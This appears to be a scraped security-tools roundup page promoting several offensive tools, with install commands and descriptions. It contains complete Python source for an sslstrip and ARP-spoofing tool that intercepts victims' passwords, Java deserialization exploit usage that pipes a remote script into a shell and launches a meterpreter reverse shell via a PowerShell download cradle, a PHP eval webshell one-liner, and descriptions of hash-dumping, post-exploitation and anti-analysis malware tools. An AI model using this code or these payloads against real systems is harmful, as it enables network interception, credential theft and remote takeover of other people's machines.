git clone https://github.com/PeterMosmans/security-scripts
cd security-scripts

Source : https://github.com/PeterMosmans

Whats new 9/12/2015? Working on arch linux (python3.5)
sslstrip_password_hijacker is a Automates sslstrip arp spoofing MITM attack. FOR TESTING PURPOSES ONLY.
System Support: Arch, Debian, Ubuntu, Kali Linux, Fedora & Centos
Dependency:
– Python 3.x
– Nmap
– dsniff
– sslstrip

password_hijacker.py Script:

import re
import os
import sys
import time
import utils
import platform
from urllib.parse import unquote
from subprocess import Popen, PIPE

SUPPORTED = ['arch', 'debian', 'ubuntu', 'centos', 'fedora']


class PasswordHaijacker(object):
    """Main class"""
    def __init__(self):
        pass

    def main(self):
        self.check_args()
        self.print_welcome_message()
        print('Checking dependencies\n')
        self.install_dependencies()      
        print('Scanning network interfaces.\n')
        interfaces = self.get_interfaces()
        self.print_list(interfaces)
        interface = interfaces[int(input('\nSelect your interface.\t'))-1]
        print('Selected interface: %s\n' % interface)  
        print('Scanning networks.\n')
        networks = self.get_networks()
        self.print_list(networks)
        network = networks[int(input('\nSelect your network.\t'))-1]
        print('Selected network: %s\n' % network) 
        print('Scanning selected network...')
        hosts = self.get_hosts(network)
        getaway = hosts[0]
        self.print_list(hosts)
        selected_hosts = self.select_hosts(hosts)  
        print("Enabling IP packets forwarding.")
        self.ip_forward()
        print("Enabling HTTP traffic redirection. Port is 6000.")
        self.traffic_redirection()
        print("Starting arpspoof")
        self.arpspoof(interface, selected_hosts, getaway)
        logfile = os.path.abspath(input("Enter log file path. Default: ./log.txt\t") or "log.txt")
        print(logfile)
        self.start_sslstrip(logfile) 
        while input("Search passwords? [y/n]\t").lower() == 'y':
            self.search(logfile)

    def search(self, logfile):
        mod = os.stat(logfile).st_mtime
        regexp = "[0-9]+-[0-9]+-[0-9]*.*:.*\n*.*pass.*"
        while True:
            if os.stat(logfile).st_mtime != mod:
                res = '\n'.join(self.execute_command("strings %s" % logfile))
                res = re.findall(regexp, str(res))
                for i in res: print(unquote(i.replace('\n', ' ')))
                time.sleep(1)
                mod = os.stat(logfile).st_mtime    

    def clean_logfile(self, logfile):
        basename = os.path.basename(logfile)
        print(self.execute_command("strings %s > clean_%s" % (logfile, basename)))

    def print_welcome_message(self):  
        sep = '***********************************'
        welcome_message = """%s\nWelcome to the password hijacker.\n\n%s\n\nFolow the instructions.\n\nUse -r flag to revert changes \n
    Note that package autoinstall not tested on dpkg-based distributions.\n""" % (sep, sep)
        print(welcome_message)  

    def select_hosts(self, hosts):
        hosts_number = input('Select hosts separeted with commas. "*" for all\t')
        hosts_number = hosts_number.split(',') if '*' not in hosts else '*'
        selected_hosts = []
        if hosts_number[0] != '*':
            for host in hosts_number:
                selected_hosts.append(hosts[int(host)-1])
        else:
            selected_hosts = hosts  
        return selected_hosts            

    def print_list(self, list_):
        """Helper function to print list."""
        count = 0
        for item in list_:
            count+=1
            print('%s) %s' % (count, item))    

    def check_args(self):
        if '-r' in sys.argv or '--revert' in sys.argv:
            print("Reverting system configuration.")
            self.clean()
            exit()    

    def install_dependencies(self):
        dependencies = utils.Dependencies()
        if not dependencies.all_installed():
            install = input('Not all dependencies are installed. Do you want to install them automaticly? [Y/n]\t') or 'y'
            if install.lower() == 'n':
                exit(1)
            elif not platform.linux_distribution(supported_dists = SUPPORTED)[0]:
                exit('Your distribution is not supported yet. \nSorry :(')
            dependencies.install()                    

    def execute_command(self, command):
        process = Popen(command, shell=True, stdout=PIPE, stdin=PIPE).communicate()[0]
        res = process.decode("utf-8").splitlines()
        return res        

    def get_interfaces(self):
        return self.execute_command('ls /sys/class/net')
        

    def get_networks(self):
        return self.execute_command('ip r | grep -v default | awk \'{print $1}\'')

    def get_hosts(self, network):
        return self.execute_command("nmap -sP %s | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'" % network)

    def ip_forward(self):
        self.execute_command("echo 1 > /proc/sys/net/ipv4/ip_forward")   

    def traffic_redirection(self):
        self.execute_command("iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 6000") 

    def arpspoof(self, interface, ips, getaway):
        for ip in ips:
            self.execute_command("arpspoof -i %s -t %s %s >> log2.txt 2>&1 &" % (interface, ip, getaway))        
        
    def start_sslstrip(self, logfile):
        self.execute_command("sslstrip -l 6000 -w %s >> /dev/null 2>&1 &" % logfile)

    def clean(self):
        self.execute_command("killall -9 arpspoof sslstrip >> /dev/null 2>&1 &")   
        self.execute_command("iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 6000") 
        self.execute_command("echo 0 > /proc/sys/net/ipv4/ip_forward")


if __name__ == '__main__':
    if os.geteuid() != 0:
        exit("You need to have root privileges to run this script.\nPlease try again, this time using 'sudo'. Exiting.")
    ph = PasswordHaijacker()    
    ph.main()

Utils.py Script:

"""
Utils
"""
import platform
from password_hijacker import SUPPORTED
from subprocess import Popen, PIPE, call

DEPENDENCIES = ['nmap', 'sslstrip', 'dsniff']

class Dependencies(object):
    """Installs script dependencies"""
    def __init__(self, deps=DEPENDENCIES):
        self.deps = deps
        self.distr = platform.linux_distribution(supported_dists = SUPPORTED)[0]
        self.package_manager = PackageAutoinstall(self.distr)
        
    def install(self):
        for dep in self.deps:
            self.package_manager.check_and_install(dep)

    def all_installed(self):
        ok = True
        for dep in self.deps:    
            if self.package_manager.installed(dep) != ok:
                ok = False
        return ok


class PackageAutoinstall(object):
    """Package management in supported distros"""
    def __init__(self, distr):
        self.distr = distr
        
        self.commands = {
            'arch' : {
                'install' : 'pacman -Sy --noconfirm',
                'check' : 'pacman -Q | grep'
            },
            'debian' : {
                'install' : 'apt-get install -qq --force-yes',
                'check' : 'dpkg -s'
            },
            'ubuntu' : {
                'install' : 'apt-get install -qq --force-yes',
                'check' : 'dpkg -s'
            },
            'centos': {
                'install' : 'yum -y install',
                'check' : 'rpm -qa | grep'
            },     
            'fedora': {
                'install' : 'yum -y install',
                'check' : 'rpm -qa | grep'
            }, 
        }

    def installed(self, packagename):
        """
        Returns True when package is installed. False otherwise.
        """
        command = '%s %s' % (self.commands.get(self.distr).get('check'), packagename)
        process = Popen(command, shell=True, stdout=PIPE, stdin=PIPE).communicate()[0]
        if process:
            return True    
        return False    

    def install(self, packagename):   
        command = '%s %s' % (self.commands.get(self.distr).get('install'), packagename)
        call(command, shell=True)

    def check_and_install(self, packagename):
        if not self.installed(packagename):
            print('***\n%s not installed\n***\n' % packagename)
            print('***\nInstalling %s\n***\n' % packagename)
            self.install(packagename)    
        else:    print('%s aleady installed' % packagename)    

if __name__ == '__main__':
    #print(PackageAutoinstall('centos').check_and_install('nmap')) 
    print(Dependencies(['nmap', 'sslstrip']).all_installed()      )

or Install uging Git:

git clone https://github.com/K-DOT/sslstrip_password_hijacker
cd sslstrip_password_hijacker
python3 password_hijacker.py

Source : https://github.com/K-DOT

Domi-Owned is a tool used for compromising IBM/Lotus Domino servers.
Tested on IBM/Lotus Domino 8.5.2, 8.5.3, 9.0.0, and 9.0.1 running on Windows and Linux.

Domi-Owned is a tool used for compromising IBM/Lotus Domino servers.

Changelog 10/12/2015: Better version detection, random user agents, added requirements.txt

Usage
A valid username and password is not required unless ‘names.nsf’ and/or ‘webadmin.nsf’ requires authentication.

Fingerprinting
Running Domi-Owned with just the –url flag will attempt to identify the Domino server version, as well as check if ‘names.nsf’ and ‘webadmin.nsf’ requires authentication.
If a username and password is given, Domi-Owned will check to see if that account can access ‘names.nsf’ and ‘webadmin.nsf’ with those credentials.

Dump Hashes
To dump all Domino accounts with a non-empty hash from ‘names.nsf’, run Domi-Owned with the –hashdump flag. This prints the results to the screen and writes them to separate out files depending on the hash type (Domino 5, Domino 6, Domino 8).

Quick Console
The Domino Quick Console is active by default; however, it will not show the command’s output. A work around to this problem is to redirect the command output to a file, in this case ‘log.txt’, that is then displayed as a web page on the Domino server.
If the –quickconsole flag is given, Domi-Owned will access the Domino Quick Console, through ‘webadmin.nsf’, allowing the user to issue native Windows or Linux commands. Domi-Owned will then retrieve the output of the command and display the results in real time, through a command line interpreter. Type exit to quit the Quick Console interpreter, which will also delete the ‘log.txt’ output file.

Installation using git:

git clone https://github.com/coldfusion39/domi-owned
cd domi-owned
pip install -r requirements.txt
python domi-owned.py

Update
cd domi-owned
git pull

Source : https://github.com/coldfusion39 | Our post before http://seclist.us/dominos-own-is-a-ibmlotus-domino-exploitation.html

ATSCAN-V1 is a perl script with function Dork scanner. XSS scanner. LFI scanner. Filter wordpress and Joomla sites in the server. Find Admin page. Decode / Encode MD5 + Base64.

Principal MENU:
1 = DORK SCANNER
2 = SITE SCANNER
3 = SERVER SCANNER
4 = MD5 / BASE 64
5 = ABOUT
6 = EXIT (->)

on WIndows XP/7/Vista/8.1

SCAN SITES OPTIONS:
[+] 1 = CHECK HTTPD VERSION
[+] 2 = XSS SCAN
[+] 3 = LFI SCAN
[+] 4 = RFI SCAN (JOOMLA)
[+] 5 = RFI SCAN (WORDPRESS)
[+] 6 = XSS + LFI
[+] 7 = FIND ADMIN PAGE
[+] 8 = BACK (<-)
[+] 9 = EXIT (->)

ATSCAN-V1 Script Download:

git clone https://github.com/AlisamTechnology/ATSCAN-V1
cd ATSCAN-V1
chmod +x ATSCAN
./ATSCAN

note: Best Run on Ubuntu 14.04, Kali Linux 2.0, Arch Linux, Fedora Linux, Centos | if you use a windows you can download manualy 
at https://github.com/AlisamTechnology/ATSCAN-V1/archive/master.zip and rename file file ATSCAN to ATSCAN.pl

Source : https://github.com/AlisamTechnology | Download Mirror ATSCAN-V1-master

al-khaser is a PoC malware with good intentions that aimes to stress your anti-malware system.

Latest Change 10/12/2012:
+ Fix Windows 10 detection -> RtlGetVersion
+ add NtQueryObject : ObjectTypeInformation anti debug

al-khaser is a PoC malware with good intentions that aimes to stress your anti-malware system.

It performs a bunch of nowadays malwares tricks and the goal is to see if you catch them all.
Possible uses :
+ You are making an anti-debug plugin and you want to check its effectiveness.
+ You want to ensure that your sandbox solution is hidden enough.
+ Or you want to ensure that your malware analysis environment is well hidden.

Please, if you encounter any of the anti-analysis tricks which you have seen in a malware, don’t hesitate to contribute.
Anti-debugging attacks
– IsDebuggerPresent
– CheckRemoteDebuggerPresent
– Process Environement Block (BeingDebugged)
– Process Environement Block (NtGlobalFlag)
– ProcessHeap (Flags)
– ProcessHeap (ForceFlags)
– NtQueryInformationProcess (ProcessDebugPort)
– NtQueryInformationProcess (ProcessDebugFlags)
– NtQueryInformationProcess (ProcessDebugObject)
– NtSetInformationThread (HideThreadFromDebugger)
– NtQueryObject (ObjectTypeInformation)
– CloseHanlde (NtClose) Invalide Handle
– UnhandledExceptionFilter
– OutputDebugString (GetLastError())
– Hardware Breakpoints (SEH / GetThreadContext)
– Software Breakpoints (INT3 / 0xCC)
– Memory Breakpoints (PAGE_GUARD)
– Interrupt 1
– Parent Process (Explorer.exe)
– SeDebugPrivilege (Csrss.exe)

Anti Dumping
– Erase PE header from memory

Download from source: al-khaser.zip
Source : https://github.com/LordNoteworthy

Changelog v-1.3.7:
– Updated powerview.ps1
– Added situational_awareness/network/powerview/get_cached_rdpconnection
– Added situational_awareness/network/powerview/set_ad_object
– Added management/downgrade_account
– Added credentials/mimikatz/cache

empire-1-3-7

Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework.

Empire Module Menu

Installation using git:

git clone https://github.com/PowerShellEmpire/Empire
cd Empire/setup
./install.sh
python setup_database.py (for setup database)
./empire

Update:
cd Empire
git pull

Initial Setup:
Run the ./setup/install.sh script. This will install the few dependencies and run the ./setup/setup_database.py script. The setup_database.py file contains various setting that you can manually modify, and then initializes the ./data/empire.db backend database. No additional configuration should be needed- hopefully everything works out of the box.
Running ./empire will start Empire, and ./empire –debug will generate a verbose debug log at ./empire.debug. The included ./data/reset.sh will reset/reinitialize the database and launch Empire in debug mode.

Download : v1.3.zip | v1.3.0.tar.gz |Our Post Before | Clone Url
Source : http://www.powershellempire.com | https://github.com/PowerShellEmpire

Changelog v-2:
+ Add option to scan from list: xss lfi rfi admin page (Mass Scan)
+ Add lists verification
+ Add input verification.
+ Optimize results.

ATSCAN-v-2

ATSCAN is a perl script with function Dork scanner. XSS scanner. LFI scanner. Filter wordpress and Joomla sites in the server. Find Admin page. Decode / Encode MD5 + Base64.

Principal MENU:
1 = DORK SCANNER
2 = SITE SCANNER
3 = SERVER SCANNER
4 = MD5 / BASE 64
5 = ABOUT
6 = EXIT (->)

SCAN SITES OPTIONS:
[+] 1 = CHECK HTTPD VERSION
[+] 2 = XSS SCAN
[+] 3 = LFI SCAN
[+] 4 = RFI SCAN (JOOMLA)
[+] 5 = RFI SCAN (WORDPRESS)
[+] 6 = XSS + LFI
[+] 7 = FIND ADMIN PAGE
[+] 8 = BACK (<-)
[+] 9 = EXIT (->)

ATSCAN-V1.1 Script Download: ATSCAN-V1.1-master (Mirror)

git clone https://github.com/AlisamTechnology/ATSCAN-V1.1
cd ATSCAN-V1
chmod +x ATSCAN
./ATSCAN

note: Best Run on Ubuntu 14.04, Kali Linux 2.0, Arch Linux, Fedora Linux, Centos | if you use a windows you can download manualy 
at https://github.com/AlisamTechnology/ATSCAN-V1.1/archive/master.zip and rename file file ATSCAN to ATSCAN.pl

Source : https://github.com/AlisamTechnology

Disclaimer This tool is for learning and research purposes, not for commercial purposes, if there are any legal disputes therefore, without any relationship with the tool author.
exserial is a Java Untrusted Deserialization Exploits Tools.

Java Untrusted Deserialization Exploits Tools Support OS: Mac OSX, Linux and Windows

Scripts Lists:
+ jboss.py Usage: python jboss.py <jboss_host> </path/to/payload>
+ jenkin.py Usage: python jenkin.py <jenkins_url> </path/to/payload>
+ weblogic.py Usage: python weblogic.py <host> <port> </path/to/payload>
+ websphere.py Usage: python websphere.py <websphere_soap_url> </path/to/payload>

Installation and Usage:

git clone https://github.com/RickGray/exserial
cd exserial

Usage:
java -jar exserial.jar
java -jar exserial.jar CommandExec
java -jar exserial.jar CommandExec Linux "curl http://yourvictim.com/todo.sh|/bin/sh" > demo1.ser
java -jar exserial.jar CommandExec Win "powershell IEX (New-Object Net.WebClient).DownloadString('http://yourvictim.com/CodeExecution/Invoke--Shellcode.ps1');Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.130.1 -Lport 4444 -Force" > demo2.ser

2.Classinject
For the target server to dynamically load our package and perform the specified JAR main way to specify the class name. For example, based on the Metasploit Framework msfvenom generate java / meterpreter / reverse_tcp JAR package:

msfvenom --payload="java/meterpreter/reverse_tcp" LHOST=192.168.130.1 LPORT=4444 -t jar > java_meterpreter_reverse_tcp.jar

java -jar exserial.jar ClassInject "http://myserver.com/java_meterpreter_reverse_tcp.jar" "metasploit.Payload" > demo3.ser

Update Record:
+ 2015-12-12 increase ClassInject Gadget execution chain generates local classes and deserialization test class.
+ 2015-12-10 update the directory structure & repair websphere.py via script bug.
+ 2015-12-07 Based CommonsCollections <= 3.2.1 Gadget generation program exserial.jar (included jboss, jenkins, weblogic, websphere use script

Source: https://github.com/RickGray

Latest Change:
+ payload, libs and blade.py: Refactoring some code
+ correct some little mistakes

Blade is a webshell connection tool based on console, currently under development and aims to be a choice of replacement of Chooper (中国菜刀). Chooper is a very cool webshell client with widly typies of server side scripts supported, but Chooper can only work on Windows opreation system, so this is the motivation of create another “Chooper” supporting Windows, Linux & Mac OS X. Blade is based on Python, so it allows users to modify the webshell connection payloads so that Blade can bypass some specified WAF which Chooper can not.
Support System: windows XP/7/Vista/8.1, Ubuntu 14.04, Kali Linux 2.0
Dependency:
– Python 2.7.x
– httplib2
– getopt
– re
– base64

Major functions:
+ Manage a web server with only one-line code on it, just like: <?php @eval($_REQUEST[“cmd”]); ?>
+ PHP, ASP, ASPX & JSP supported.
+ Terminal Console provided.
+ File management & Dadabase management.

Features:
+ Cross-plaform supported (Python needed)
+ Customizable WAF bypass payloads
+ Compatible with Chooper’s server side scripts

Installation :

git clone https://github.com/wonderqs/Blade
cd Blade

Update
cd Blade
git pull

Source : https://github.com/wonderqs | Our Post Before

Damn Vulnerable Node Application (DVNA) is a PHP/MySQL web application that is damn vulnerable. Its main goal is to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and to aid both students & teachers to learn about web application security in a controlled class room environment.

Node.Js Reverse Shell

The aim of DVNA is to practice some of the most common web vulnerability, with various difficultly levels, with a simple straightforward interface. Please note, there are both documented and undocumented vulnerability with this software. This is intentional. You are encouraged to try and discover as many issues as possible.

WARNING!
Damn Vulnerable Node Application is damn vulnerable! Do not upload it to your hosting provider’s public html folder or any Internet facing servers, as they will be compromised. It is recommend using a virtual machine (such as VirtualBox or VMware), which is set to NAT networking mode. Inside a guest machine, you can downloading and install XAMPP for the web server and database.

Disclaimer
We do not take responsibility for the way in which any one uses this application (DVNA). We have made the purposes of the application clear and it should not be used maliciously. We have given warnings and taken measures to prevent users from installing DVNA on to live web servers. If your web server is compromised via an installation of DVNA it is not our responsibility it is the responsibility of the person/s who uploaded and installed it.

Intallation using Git:

git clone https://github.com/quantumfoam/DVNA
cd DVNA

Windows + XAMPP
Linux Packages

If you are using a Debian based Linux distribution, you will need to install the following packages (or their equivalent):
apt-get -y install apache2 mysql-server php5 php5-mysql php5-gd

Database Setup
code markup

Default Credentials:
Default username = admin
Default password = password

Source : https://github.com/quantumfoam